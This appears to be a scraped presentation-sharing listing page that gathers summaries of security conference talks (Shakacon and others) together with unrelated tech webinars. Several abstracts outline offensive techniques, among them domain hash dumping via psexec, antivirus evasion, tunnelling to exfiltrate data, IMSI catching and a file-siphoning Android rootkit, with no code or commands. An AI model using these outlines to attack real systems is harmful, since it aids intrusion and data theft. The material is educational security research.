theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
A free workshop during the AfricaHackon 2019 conference that covered popular active directory attacks and how to detect and defend against them.
BSides Iowa 2017 Wanna break JavaScript and APIs in web apps?
This document provides an overview of tools that can be used to identify and exploit vulnerabilities in JavaScript applications. It discusses Chrome and Firefox developer tools, Retire.js, Node Security Platform, Snyk, Postman, and Burp Suite. It then demonstrates how to use these tools to find and exploit vulnerabilities in the OWASP Juice Shop application, an intentionally insecure web application used for security training.
Buffer overflows
Buffer overflows are a major vulnerability that allow arbitrary code to be executed remotely by exploiting flaws in how software handles memory. They occur when a program lacks sufficient bounds checking on user input written to a buffer, allowing an attacker to overwrite adjacent memory and hijack the program flow. While techniques like data execution prevention and stack canaries provide some protection, buffer overflows remain a threat due to weaknesses in software testing and development practices. Careful coding through measures like code reviews is the best way to prevent buffer overflows.
Technical Architecture of RASP Technology
APPSEC CHALLENGES
- Writing Secure Code is not Easy
- Most follows agile development strategies
- Frequent releases and builds
- Any release can introduce or reintroduce vulnerabilities
- Problems by design.
Ex: Session Hijacking, Credential Stuffing
So you want to be a security expert
This document discusses techniques for penetration testing without uploading malware. It describes using DCERPC and Metasploit modules to execute commands, dump passwords, and extract all domain hashes from a domain controller. Uploading shells can be detected, so these methods leverage native Windows functions like the Service Control Manager to perform tasks without leaving artifacts. Command execution through psexec allows tasks like backing up registry hives to extract hashes offline without antivirus detection.
Command line for the beginner - Using the command line in developing for the...
This document provides an introduction to using the command line interface for web development. It begins with basic commands and concepts like archiving files. It then covers more advanced topics such as connecting to servers via SSH, using version control with Git, and automating tasks with Grunt or Gulp. The document aims to bring beginners up to an intermediate level of command line proficiency and provide pointers to resources for continuing to an advanced level.
Mem forensic
The document discusses volatility and memory forensics. It covers topics like how volatility works on different operating systems like Linux and Windows, acquiring memory dumps, analyzing memory structures like page tables and processes, dealing with semantic gaps in raw memory, plugin development, and investigating various artifacts in memory related to authentication, passwords, encryption, and applications. The document provides information on memory forensics techniques and how volatility is used as an open-source memory forensics framework.
Malware Analysis Made Simple
Malware analysis is important for responding quickly to security incidents and keeping costs down. Malware is the number one external threat and is adapting to evade traditional defenses like firewalls and antivirus software. When incidents do occur, organizations should have an in-house capability to analyze malware using free and open-source tools to understand the scope of infections and prevent recurrences.
Webinar NETGEAR - Come Netgear può aiutare a mitigare gli effetti del Ransomware
Cosa è e come agisce il Ransomware, le azioni da intrapprendere e cosa Netgear può favorire la mitigazione della minaccia. Snapshot istantanee illimitate a livello blocco dati e ReadyRecover, la soluzione di backup appliance per ottenere full backup ogni 15 minuti di ogni sistema windows in Azienda.
Continuous Security: From tins to containers - now what!
The document discusses securing containers throughout their lifecycle from selection of base images and configuration to runtime. It emphasizes applying security controls at each stage including static analysis of Dockerfiles, scanning of images for vulnerabilities, and using admission controllers in Kubernetes to enforce policies for privileges, network access, and resource usage. The document demonstrates potential security risks if containers are not secured properly and provides examples of admission controllers and best practices to mitigate those risks in Kubernetes.
Putting Rugged Into your DevOps Toolchain
This document discusses the need for "rugged" or hardened security solutions that can withstand adversity as part of a DevOps toolchain and culture. It outlines some past mistakes of the information security field in thinking risk assessment alone was sufficient, not integrating fully with development teams, and more. The document then introduces the Gauntlt tool, which allows security testing to be integrated into the development workflow using easy-to-read tests. Gauntlt helps security and development teams communicate better and adopt a culture of continuous integration and improvement. Example Gauntlt test files in different languages are provided.
FreeBSD: Dev to Prod
The document discusses using Vagrant and cloud platforms like GCP to develop and deploy applications from development to production. It introduces Vagrant as a tool for setting up and managing development environments and shows how to use Vagrant with FreeBSD. It then demonstrates provisioning a FreeBSD VM on GCP and discusses identity and access management on the cloud platform. The document aims to provide an overview of using Vagrant for development and cloud platforms like GCP for production deployments.
macos installation automation
The document outlines the steps taken to set up a new laptop for development purposes. It details installing various tools like Homebrew, Ruby, Git, Heroku CLI and others. It also covers configuring programs and services like Postgres, Xcode, VPN and version control with Git. All commands are provided to fully automate replicating the documented development environment setup.
Similar to Macdoored (20)
A Battle Against the Industry - Beating Antivirus for Meterpreter and More
A Battle Against the Industry - Beating Antivirus for Meterpreter and More
Living off the land and fileless attack techniques
Living off the land and fileless attack techniques
Lessons Learned in Automating Compliance for Containers
Lessons Learned in Automating Compliance for Containers
BSides Iowa 2017 Wanna break JavaScript and APIs in web apps?
BSides Iowa 2017 Wanna break JavaScript and APIs in web apps?
Command line for the beginner - Using the command line in developing for the...
Command line for the beginner - Using the command line in developing for the...
Webinar NETGEAR - Come Netgear può aiutare a mitigare gli effetti del Ransomware
Webinar NETGEAR - Come Netgear può aiutare a mitigare gli effetti del Ransomware
Continuous Security: From tins to containers - now what!
Continuous Security: From tins to containers - now what!
More from Shakacon
Modern Reconnaissance Phase on APT - protection layer
The document discusses 5 case studies of modern reconnaissance techniques used by advanced persistent threat (APT) actors. Each case study examines a different infection vector involving documents with embedded objects that first perform reconnaissance on the target system before deciding whether to deploy a final payload. The case studies demonstrate evolving tactics to avoid exposing valuable code and thwart analysis.
Shamoon
This session will provide insight into highly disruptive breaches that MANDIANT investigated over the past year. It describes how threat actors have destroyed system infrastructure and taken companies offline for weeks. The threat actors are split into two categories for this talk and focused on the SHAMOON cases. I will also talk about highlights from Incident Response cases of 2017. Financially motivated vs Non Financially motivated. I will talk about how recent attacks with SHAMOON differ - their motives compared to financially motivated threat actors. Highlights from a couple of 2017 IRs - Overview of TTPs of the important State Sponsored Attacks seen in 2017.
A Decompiler for Blackhain-Based Smart Contracts Bytecode
The document discusses decompiling Ethereum smart contracts. It describes how smart contracts written in Solidity are compiled to Ethereum Virtual Machine (EVM) bytecode that is stored on the blockchain. The bytecode contains a dispatcher that uses the first 4 bytes of the call data, representing the function hash, to determine which function to execute. Function parameters and local variables are accessed using EVM instructions like CALLDATALOAD and stored in memory and on the stack.
Honey, I Stole Your C2 Server: A Dive into Attacker Infrastructure
As an incident responder, have you ever thought about how much easier an investigation would be if you had the C2 server in your possession? In this talk, we are going to deep dive a rare investigation in which Mandiant obtained a forensic copy of an attacker C2 system. You will learn about the initial compromise of the C2 server, the tools and tactics used by the attacker, and the investigative steps taken to identify the full scope of the attack. In addition, you will learn about the specific challenges involved with the analysis, the tool I developed to carve all PostGreSQL rows from a forensic image, and some unique lessons learned from performing this investigation.
Dock ir incident response in a containerized, immutable, continually deploy...
This document discusses incident response strategies in a containerized and immutable infrastructure environment like Docker. It addresses challenges like lack of system and software inventory visibility due to rapid container changes, and lack of agent-based security due to single-purpose containers. It proposes solutions like establishing managed base container OSs, whitelisting allowed containers and files, and leveraging logs and sidecar containers to monitor for detections. Response challenges around long investigation timeframes due to short container lifetimes and lack of access are addressed with strategies like comprehensive logging, filesystem artifact preservation, and automating remote response capabilities.
Reviewing the Security of ASoC Drivers in Android Kernel
The ALSA System on Chip (ASoC) provides a common architecture for chip vendors to develop drivers for their sound SoCs and codecs. It is also the core management of sound drivers in Android kernel. Compare with the well-known libstagefright library, the ASoC driver works in kernel space and talk to up level media libraries through HAL, thus it plays a much more important role, it is the real heart of the whole Android media service.
However, few vulnerabilities have been disclosed on this part on Android before our research (starting from the middle of 2016). There are multiple reasons: The ALSA project has almost twenty years history and most bugs may have been killed in the past few years in main linux kernel; Developers become more and more familiar with the project thus not easy to introduce bunch of new bugs; The standard of coding style, testing flow and code review processes guaranteed the quality, and this is often what the open source projects benefits.
But what if this old project meets with the much younger Android OS? The situation is really out of my expectation. With a total review of the ASoC implementation and combining effective fuzzing tools, I was able to disclose dozens of bugs in Android ASoC drivers. These bugs includes the type of normal OOBs, the stack overflows, the heap overflows, race conditions and the use-after-free/double-frees. And what comes out more interesting is that, these bugs were introduced from several different channels: chip vendors, device manufacturers, and the ALSA project maintainers.
This proves me the fact that the ASoC driver in Android kernel is a completely vulnerable but overlooked attack surface.
Silent Protest: A Wearable Protest Network
Independent observers are noting a decrease in Freedom of speech worldwide. In its 2016 report, Reporter without Borders unveils a "climate of fear and tension combined with increasing control over newsrooms by governments and private-sector interests.", while Amnesty International's report on the State of the World Human Rights states that “2016 was the year when the cynical use of ‘us vs them’ narratives of blame, hate and fear took on a global prominence to a level not seen since the 1930s. Too many politicians are answering legitimate economic and security fears with a poisonous and divisive manipulation of identity politics in an attempt to win votes”.
At the same time, the United Nations Statistics Division insist on the unprecedented literacy rate achieved by Mankind globally. Human beings have more and more things to say.
With this project, we present ProtestWear: a wearable DIY protest network build of inexpensive network gear and open source software. Its goal is to facilitate Freedom of Speech, enable Art sharing in countries where this Human Right is being challenged by authorities, and offer a customizable portable Anonymous Protest Network platform reliable and affordable enough to be built in third world countries and developed countries alike.
WiFi-Based IMSI Catcher
We introduce a new type of IMSI catcher which operates over WiFi. Whilst existing Stingray type IMSI catchers exploit 24G radio protocols to track movements of mobile subscribers, in this talk, we introduce a two new approaches to track mobile devices which exploit authentication protocols that operate over WiFi. These protocols are now widely implemented in most modern mobile OSes, allowing for the creation of a low cost (<25$) IMSI catcher.
We demonstrate how users may be tracked on range of smartphones and tablets including those running iOS, Android and other mobile OSs. This tracking can be performed silently and automatically without any interaction from the tracked user. We have developed a proof of concept system that demonstrates our IMSI catcher employing passive and active techniques.
Finally, we present guidelines for vendors and cellular network operators to mitigate the user privacy issues that arise.
Sad Panda Analysts: Devolving Malware
The document discusses various malware techniques, including:
1) Devolving malware discusses getting unauthorized access to systems through social engineering and exploiting software vulnerabilities to gain shell access or sensitive files.
2) Password protected documents and embedded macros aim to trick users into enabling malicious macros that download and execute additional payloads like VBS scripts.
3) Several malware samples are described that use techniques like delayed execution, encoded payloads, and displaying decoy documents to evade detection in sandboxes and steal sensitive information from victims.
4) The document advocates copying code from other malware projects instead of writing original malware due to the time and effort required. User targeting, anti-sandbox tricks, and packers are also
reductio [ad absurdum]
Programmers naturally assume that different programs require different code. Minesweeper is not the same as AES, Windows is not the same as Linux, and Notepad is not the same as malware. But what if this were not the case? We'll walk through how we can convert all programs into the exact same code - allowing the CPU to execute the same sequence of instructions, to run any possible application. By fundamentally changing our ideas about what it means to "compute", we'll outline the unsettling implications for malware detection, and open some fascinating new doors in exploitation.
XFLTReat: a new dimension in tunnelling
This presentation will sum up how to do tunnelling with different protocols and will have different perspectives detailed. For example, companies are fighting hard to block exfiltration from their network: they use http(s) proxies, DLP, IPS technologies to protect their data, but are they protected against tunnelling? There are so many interesting questions to answer for users, abusers, companies and malware researchers. Mitigation and bypass techniques will be shown you during this presentation, which can be used to filter any tunnelling on your network or to bypass misconfigured filters.
Windows Systems & Code Signing Protection by Paul Rascagneres
This presentation explains the code signing mechanism (authenticode) developed by Microsoft on Windows systems. The presentation will first explain the kernel implication and the impact on driver development. This protection firstly annoyed rootkit developers but they found several ways to bypass it. Well-known rootkits such as Derusbi, Uroburos or GrayFish use tricks to bypass driver signature. These techniques will be described during the presentation. Finally, the user-land will be discussed with the new library injection protection based on code signing implemented in Windows 10 TH2 and especially for the Edge process.
When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...
Communication protocols are core to computing devices. They have evolved from the traditional Serial and LAN ports to complex (and lightweight) protocols of today, such as Bluetooth Low Energy (BLE), ANT+, ZigBee, etc.
Bluetooth Low Energy (BLE) is a popular protocol of choice for low energy, low performance computing systems. While versions of the BLE specification prior to 4.2 allowed simple key mechanisms to encrypt the communication between connected nodes, the more recent specification of BLE (4.2) provides better channel encryption via the Secure Simple Pairing (SSP) mode to protect data against snooping and man-in-the-middle style attacks. These protocols are used extensively by wearables such as smart watches and activity trackers.
Most wearables work in conjunction with a companion mobile application running on a platform that supports BLE with the aforementioned security mechanisms. We looked at Android and iOS for our study. We observe that there are fundamental assumptions (leading security limitations) in the adoption of the BLE security specifications on these two platforms. Relying on the standard BLE APIs for Android and iOS may be insufficient and may even project a false sense of security. It is critical to understand the degree of security that the BLE specifications can offer, and clearly separate that from the developers’ responsibility to design application level security in order to assure confidentiality and integrity of data being transmitted between a wearable device and its companion application.
The Search for the Perfect Door - Deviant Ollam
You have spent lots of money on a high-grade, pick-resistant, ANSI-rated lock for your door. Your vendor has assured you how it will resist attack and how difficult it would be for someone to copy your key. Maybe they’re right. But… the bulk of attacks that both penetration testers and also criminals attempt against doors have little or nothing to do with the lock itself! This talk will be a hard-hitting exploration (full of photo and video examples) of the ways in which your door — the most fundamental part of your physical security — can possibly be thwarted by someone attempting illicit entry. The scary problems will be immediately followed by simple solutions that are instantly implementable and usually very within-budget. You, too, can have a near-perfect door… if you’re willing to learn and understand the problems that all doors tend to have.
Swift Reversing by Ryan Stortz
At WWDC 2014, Apple introduced Swift, their revolutionary new programming language for the future. Swift promises unapologetic optimization, outstanding speed, and best-in-class language features. Swift is sleek, stunning, and already the most loved language on StackOverflow. Up until now, no reverse engineer has dissected the language or the artifacts it produces and presented their findings. However, since an hour long presentation discussing Swift class structure and string layouts would be painfully boring, this talk actually presents a systematic approach to binary reverse engineering new foreign ABIs using Swift as a case study. I’ll present approaches for identifying control structures and flow, recovering class layouts, mapping machine code patterns to higher level language constructs, and more!
This presentation will leave you with the knowledge and confidence needed to take on any ABIs – maybe even Haskell.
Making a Scalable Automated Hacking System by Artem Dinaburg
In this presentation, I’ll tell the story of our Cyber Grand Challenge adventure, explain how to automatically find and patch bugs in binary code, and discuss what’s next for our bug finding system.
The story will describe how our small team of internationally distributed engineers made an automated bug finding system that placed 2nd in vulnerability discovery. I will cover both the fun parts and the necessary-but-boring-parts of automated bug finding. Fun parts include combining existing fuzzing and symbolic execution tools into one coherent system, and making fuzzing fast by identifying and eliminating performance bottlenecks. The necessary-but-boring-parts include automated testing, deployment, and configuration management, otherwise known as devops.
Second, I’ll talk about how to patch bugs by translating binaries to LLVM bitcode, patching the bitcode, and re-emitting working patched binaries. I will cover different patching strategies and the requirements for each approach. I will also discuss instrumentation techniques, transformation operations, and analysis passes that are enabled by LLVM translation.
Finally, I will talk about how researchers should fundamentally change the way bug finding tools are developed. Currently each tools is its own discrete island. However, there are quantifiable benefits to be gained by applying the Unix philosophy of discrete, communicating tools to the problem of bug finding.
Hunting Government Back Doors by Joseph Menn
Although the post-Snowden White House advisory commission recommended that the U.S. forswear tampering with widely used encryption, the administration and intelligence agencies have declined to do so. It has therefore been left to companies and outsiders to protect the integrity of the code base and to determine where back doors have been inserted and, more rarely, how, why and by whom. I will discuss how the RSA contract came to be and how I brought it to light. I will also discuss how at least two of Juniper’s three back doors came into being. I will provide context about how many more government and private back doors are likely in service and how researchers, journalists and companies are trying to uncover them, and about the challenges facing all of those efforts.
Let's Play Doctor....by Patrick Wardle
“I think my Mac has a virus”…now what? When a Windows PC gets infected there are established diagnostic procedures to uncover and analyze the malware. Not so, on OS X. This talk will discuss OS X-specific tools and techniques that can uncover infections as well as secrets of Mac malware. So come watch as malware is dissected and learn how new tools can lead to proficient OS X malware analysis!
Fruit vs Zombies: Defeat Non-jailbroken iOS Malware by Claud Xiao
Since 2014, fifteen new malware or riskware families successfully attacked non-jailbroken iOS devices (e.g., WireLurker, Oneclickfraud, XcodeGhost, InstaAgent, ZergHelper, AceDeceiver), affected thousands of iOS apps and tens of millions users around the world. Ten of them even bypassed Apple’s code vetting and occurred at App Store. In this presentation, we will systematically study how could these malware, riskware and some Proof-of-Concepts infect non-jailbroken devices via practical vectors and approaches including abusing development certificates, bypassing code review by obfuscation, performing FairPlay MITM attack, abusing MDM solution, abusing private APIs, exploiting design flaws or app level vulnerabilities, and stealing privacy data. For each topic, we will introduce its implementation, explore real world cases, analyze its risky and consequences, explain Apple’s countermeasures, and discuss why some problems will still exist in near future. We will also share some stories of how we discovered those interesting iOS malware. Through this topic, audiences could make more effective policies to protect iOS devices in their organizations, build their own systems/tools to evaluate security risks in iOS apps, and hunt more iOS malware in the future.
Faux Disk Encryption....by Drew Suarez & Daniel Mayer
The number of mobile users has recently surpassed the number of desktop users, emphasizing the importance of mobile device security. In traditional browser-server applications, data tends to be stored on the server side where tight controls can be enforced. In contrast, many mobile applications cache data locally on the device thus exposing it to a number of new attack vectors. Moreover, locally stored data often includes authentication tokens that are, compared to browser applications, typically long-lived. One main concern is the loss of theft of a device which grants an attacker physical access which may be used by bypass security controls in order to gain access to application data. Depending on the application’s data, this can result in a loss of privacy (e.g., healthcare data, personal pictures and messages) or loss of intellectual property in the case of sensitive corporate data.
In this talk, we discuss the challenges mobile app developers face in securing data stored on devices including mobility, accessibility, and usability requirements. Given these challenges we first debunk common misconceptions about full-disk encryption and show why it is not sufficient for many attack scenarios. We then systematically introduce the more sophisticated secure storage techniques that are available for iOS and Androids respectively. For each platform, we discuss in-depth which mechanisms are available, how they technically operate, and whether they fulfill the practical security and usability requirements. We conclude the talk with a demonstration of a kernel root-kit exploit called Rosie (the evil Android maid) we created that illustrates what still can go wrong even when current best-practices are followed and what the security and mobile device community can do to address these shortcomings. Rosie was designed to siphon any file off the device and send its payload via UDP to a cloud hosted server for inspection. Because Rosie runs completely within the kernel, there is no need to modify the core system partition on the device and it has full privileges on the target system. Modifying the system partition is entirely possible on devices without strong chains of trust in their boot configurations, but it has the potential to be more complicated due to various OEM and Google-provided security measures.
More from Shakacon (20)
Modern Reconnaissance Phase on APT - protection layer
Modern Reconnaissance Phase on APT - protection layer
A Decompiler for Blackhain-Based Smart Contracts Bytecode
A Decompiler for Blackhain-Based Smart Contracts Bytecode
Honey, I Stole Your C2 Server: A Dive into Attacker Infrastructure
Honey, I Stole Your C2 Server: A Dive into Attacker Infrastructure
Dock ir incident response in a containerized, immutable, continually deploy...
Dock ir incident response in a containerized, immutable, continually deploy...
Reviewing the Security of ASoC Drivers in Android Kernel
Reviewing the Security of ASoC Drivers in Android Kernel
Windows Systems & Code Signing Protection by Paul Rascagneres
Windows Systems & Code Signing Protection by Paul Rascagneres
When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...
When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...
Making a Scalable Automated Hacking System by Artem Dinaburg
Making a Scalable Automated Hacking System by Artem Dinaburg
Fruit vs Zombies: Defeat Non-jailbroken iOS Malware by Claud Xiao
Fruit vs Zombies: Defeat Non-jailbroken iOS Malware by Claud Xiao
Faux Disk Encryption....by Drew Suarez & Daniel Mayer
Faux Disk Encryption....by Drew Suarez & Daniel Mayer
Recently uploaded
Fueling AI with Great Data with Airbyte Webinar
This talk will focus on how to collect data from a variety of sources, leveraging this data for RAG and other GenAI use cases, and finally charting your course to productionalization.
Generating privacy-protected synthetic data using Secludy and Milvus
During this demo, the founders of Secludy will demonstrate how their system utilizes Milvus to store and manipulate embeddings for generating privacy-protected synthetic data. Their approach not only maintains the confidentiality of the original data but also enhances the utility and scalability of LLMs under privacy constraints. Attendees, including machine learning engineers, data scientists, and data managers, will witness first-hand how Secludy's integration with Milvus empowers organizations to harness the power of LLMs securely and efficiently.
Project Management Semester Long Project - Acuity
Acuity is an innovative learning app designed to transform the way you engage with knowledge. Powered by AI technology, Acuity takes complex topics and distills them into concise, interactive summaries that are easy to read & understand. Whether you're exploring the depths of quantum mechanics or seeking insight into historical events, Acuity provides the key information you need without the burden of lengthy texts.
Introduction of Cybersecurity with OSS at Code Europe 2024
I develop the Ruby programming language, RubyGems, and Bundler, which are package managers for Ruby. Today, I will introduce how to enhance the security of your application using open-source software (OSS) examples from Ruby and RubyGems.
The first topic is CVE (Common Vulnerabilities and Exposures). I have published CVEs many times. But what exactly is a CVE? I'll provide a basic understanding of CVEs and explain how to detect and handle vulnerabilities in OSS.
Next, let's discuss package managers. Package managers play a critical role in the OSS ecosystem. I'll explain how to manage library dependencies in your application.
I'll share insights into how the Ruby and RubyGems core team works to keep our ecosystem safe. By the end of this talk, you'll have a better understanding of how to safeguard your code.
20240607 QFM018 Elixir Reading List May 2024
Everything I found interesting about the Elixir programming ecosystem in May 2024
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
Webinar Recording: https://www.panagenda.com/webinars/hcl-notes-und-domino-lizenzkostenreduzierung-in-der-welt-von-dlau/
DLAU und die Lizenzen nach dem CCB- und CCX-Modell sind für viele in der HCL-Community seit letztem Jahr ein heißes Thema. Als Notes- oder Domino-Kunde haben Sie vielleicht mit unerwartet hohen Benutzerzahlen und Lizenzgebühren zu kämpfen. Sie fragen sich vielleicht, wie diese neue Art der Lizenzierung funktioniert und welchen Nutzen sie Ihnen bringt. Vor allem wollen Sie sicherlich Ihr Budget einhalten und Kosten sparen, wo immer möglich. Das verstehen wir und wir möchten Ihnen dabei helfen!
Wir erklären Ihnen, wie Sie häufige Konfigurationsprobleme lösen können, die dazu führen können, dass mehr Benutzer gezählt werden als nötig, und wie Sie überflüssige oder ungenutzte Konten identifizieren und entfernen können, um Geld zu sparen. Es gibt auch einige Ansätze, die zu unnötigen Ausgaben führen können, z. B. wenn ein Personendokument anstelle eines Mail-Ins für geteilte Mailboxen verwendet wird. Wir zeigen Ihnen solche Fälle und deren Lösungen. Und natürlich erklären wir Ihnen das neue Lizenzmodell.
Nehmen Sie an diesem Webinar teil, bei dem HCL-Ambassador Marc Thomas und Gastredner Franz Walder Ihnen diese neue Welt näherbringen. Es vermittelt Ihnen die Tools und das Know-how, um den Überblick zu bewahren. Sie werden in der Lage sein, Ihre Kosten durch eine optimierte Domino-Konfiguration zu reduzieren und auch in Zukunft gering zu halten.
Diese Themen werden behandelt
- Reduzierung der Lizenzkosten durch Auffinden und Beheben von Fehlkonfigurationen und überflüssigen Konten
- Wie funktionieren CCB- und CCX-Lizenzen wirklich?
- Verstehen des DLAU-Tools und wie man es am besten nutzt
- Tipps für häufige Problembereiche, wie z. B. Team-Postfächer, Funktions-/Testbenutzer usw.
- Praxisbeispiele und Best Practices zum sofortigen Umsetzen
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
ここ3000字までしか入らないけどタイトルの方がたくさん文字入ると思います。
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
A Mix Chart displays historical data of numbers in a graphical or tabular form. The Kalyan Rajdhani Mix Chart specifically shows the results of a sequence of numbers over different periods.
Building Production Ready Search Pipelines with Spark and Milvus
Spark is the widely used ETL tool for processing, indexing and ingesting data to serving stack for search. Milvus is the production-ready open-source vector database. In this talk we will show how to use Spark to process unstructured data to extract vector representations, and push the vectors to Milvus vector database for search serving.
Webinar: Designing a schema for a Data Warehouse
Are you new to data warehouses (DWH)? Do you need to check whether your data warehouse follows the best practices for a good design? In both cases, this webinar is for you.
A data warehouse is a central relational database that contains all measurements about a business or an organisation. This data comes from a variety of heterogeneous data sources, which includes databases of any type that back the applications used by the company, data files exported by some applications, or APIs provided by internal or external services.
But designing a data warehouse correctly is a hard task, which requires gathering information about the business processes that need to be analysed in the first place. These processes must be translated into so-called star schemas, which means, denormalised databases where each table represents a dimension or facts.
We will discuss these topics:
- How to gather information about a business;
- Understanding dictionaries and how to identify business entities;
- Dimensions and facts;
- Setting a table granularity;
- Types of facts;
- Types of dimensions;
- Snowflakes and how to avoid them;
- Expanding existing dimensions and facts.
UiPath Test Automation using UiPath Test Suite series, part 6
Welcome to UiPath Test Automation using UiPath Test Suite series part 6. In this session, we will cover Test Automation with generative AI and Open AI.
UiPath Test Automation with generative AI and Open AI webinar offers an in-depth exploration of leveraging cutting-edge technologies for test automation within the UiPath platform. Attendees will delve into the integration of generative AI, a test automation solution, with Open AI advanced natural language processing capabilities.
Throughout the session, participants will discover how this synergy empowers testers to automate repetitive tasks, enhance testing accuracy, and expedite the software testing life cycle. Topics covered include the seamless integration process, practical use cases, and the benefits of harnessing AI-driven automation for UiPath testing initiatives. By attending this webinar, testers, and automation professionals can gain valuable insights into harnessing the power of AI to optimize their test automation workflows within the UiPath ecosystem, ultimately driving efficiency and quality in software development processes.
What will you get from this session?
1. Insights into integrating generative AI.
2. Understanding how this integration enhances test automation within the UiPath platform
3. Practical demonstrations
4. Exploration of real-world use cases illustrating the benefits of AI-driven test automation for UiPath
Topics covered:
What is generative AI
Test Automation with generative AI and Open AI.
UiPath integration with generative AI
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays, June 2024 with Maria Copot 20
Driving Business Innovation: Latest Generative AI Advancements & Success Story
Are you ready to revolutionize how you handle data? Join us for a webinar where we’ll bring you up to speed with the latest advancements in Generative AI technology and discover how leveraging FME with tools from giants like Google Gemini, Amazon, and Microsoft OpenAI can supercharge your workflow efficiency.
During the hour, we’ll take you through:
Guest Speaker Segment with Hannah Barrington: Dive into the world of dynamic real estate marketing with Hannah, the Marketing Manager at Workspace Group. Hear firsthand how their team generates engaging descriptions for thousands of office units by integrating diverse data sources—from PDF floorplans to web pages—using FME transformers, like OpenAIVisionConnector and AnthropicVisionConnector. This use case will show you how GenAI can streamline content creation for marketing across the board.
Ollama Use Case: Learn how Scenario Specialist Dmitri Bagh has utilized Ollama within FME to input data, create custom models, and enhance security protocols. This segment will include demos to illustrate the full capabilities of FME in AI-driven processes.
Custom AI Models: Discover how to leverage FME to build personalized AI models using your data. Whether it’s populating a model with local data for added security or integrating public AI tools, find out how FME facilitates a versatile and secure approach to AI.
We’ll wrap up with a live Q&A session where you can engage with our experts on your specific use cases, and learn more about optimizing your data workflows with AI.
This webinar is ideal for professionals seeking to harness the power of AI within their data management systems while ensuring high levels of customization and security. Whether you're a novice or an expert, gain actionable insights and strategies to elevate your data processes. Join us to see how FME and AI can revolutionize how you work with data!
Main news related to the CCS TSI 2023 (2023/1695)
An English 🇬🇧 translation of a presentation to the speech I gave about the main changes brought by CCS TSI 2023 at the biggest Czech conference on Communications and signalling systems on Railways, which was held in Clarion Hotel Olomouc from 7th to 9th November 2023 (konferenceszt.cz). Attended by around 500 participants and 200 on-line followers.
The original Czech 🇨🇿 version of the presentation can be found here: https://www.slideshare.net/slideshow/hlavni-novinky-souvisejici-s-ccs-tsi-2023-2023-1695/269688092 .
The videorecording (in Czech) from the presentation is available here: https://youtu.be/WzjJWm4IyPk?si=SImb06tuXGb30BEH .
5th LF Energy Power Grid Model Meet-up Slides
5th Power Grid Model Meet-up
It is with great pleasure that we extend to you an invitation to the 5th Power Grid Model Meet-up, scheduled for 6th June 2024. This event will adopt a hybrid format, allowing participants to join us either through an online Mircosoft Teams session or in person at TU/e located at Den Dolech 2, Eindhoven, Netherlands. The meet-up will be hosted by Eindhoven University of Technology (TU/e), a research university specializing in engineering science & technology.
Power Grid Model
The global energy transition is placing new and unprecedented demands on Distribution System Operators (DSOs). Alongside upgrades to grid capacity, processes such as digitization, capacity optimization, and congestion management are becoming vital for delivering reliable services.
Power Grid Model is an open source project from Linux Foundation Energy and provides a calculation engine that is increasingly essential for DSOs. It offers a standards-based foundation enabling real-time power systems analysis, simulations of electrical power grids, and sophisticated what-if analysis. In addition, it enables in-depth studies and analysis of the electrical power grid’s behavior and performance. This comprehensive model incorporates essential factors such as power generation capacity, electrical losses, voltage levels, power flows, and system stability.
Power Grid Model is currently being applied in a wide variety of use cases, including grid planning, expansion, reliability, and congestion studies. It can also help in analyzing the impact of renewable energy integration, assessing the effects of disturbances or faults, and developing strategies for grid control and optimization.
What to expect
For the upcoming meetup we are organizing, we have an exciting lineup of activities planned:
-Insightful presentations covering two practical applications of the Power Grid Model.
-An update on the latest advancements in Power Grid -Model technology during the first and second quarters of 2024.
-An interactive brainstorming session to discuss and propose new feature requests.
-An opportunity to connect with fellow Power Grid Model enthusiasts and users.
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Discover the seamless integration of RPA (Robotic Process Automation), COMPOSER, and APM with AWS IDP enhanced with Slack notifications. Explore how these technologies converge to streamline workflows, optimize performance, and ensure secure access, all while leveraging the power of AWS IDP and real-time communication via Slack notifications.
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Discover how MongoDB Atlas and vector search technology can revolutionize your application's search capabilities. This comprehensive presentation covers:
* What is Vector Search?
* Importance and benefits of vector search
* Practical use cases across various industries
* Step-by-step implementation guide
* Live demos with code snippets
* Enhancing LLM capabilities with vector search
* Best practices and optimization strategies
Perfect for developers, AI enthusiasts, and tech leaders. Learn how to leverage MongoDB Atlas to deliver highly relevant, context-aware search results, transforming your data retrieval process. Stay ahead in tech innovation and maximize the potential of your applications.
#MongoDB #VectorSearch #AI #SemanticSearch #TechInnovation #DataScience #LLM #MachineLearning #SearchTechnology
Recently uploaded (20)
Nordic Marketo Engage User Group_June 13_ 2024.pptx
Nordic Marketo Engage User Group_June 13_ 2024.pptx
Generating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and Milvus
Introduction of Cybersecurity with OSS at Code Europe 2024
Introduction of Cybersecurity with OSS at Code Europe 2024
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
Building Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and Milvus
UiPath Test Automation using UiPath Test Suite series, part 6
UiPath Test Automation using UiPath Test Suite series, part 6
Driving Business Innovation: Latest Generative AI Advancements & Success Story
Driving Business Innovation: Latest Generative AI Advancements & Success Story
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
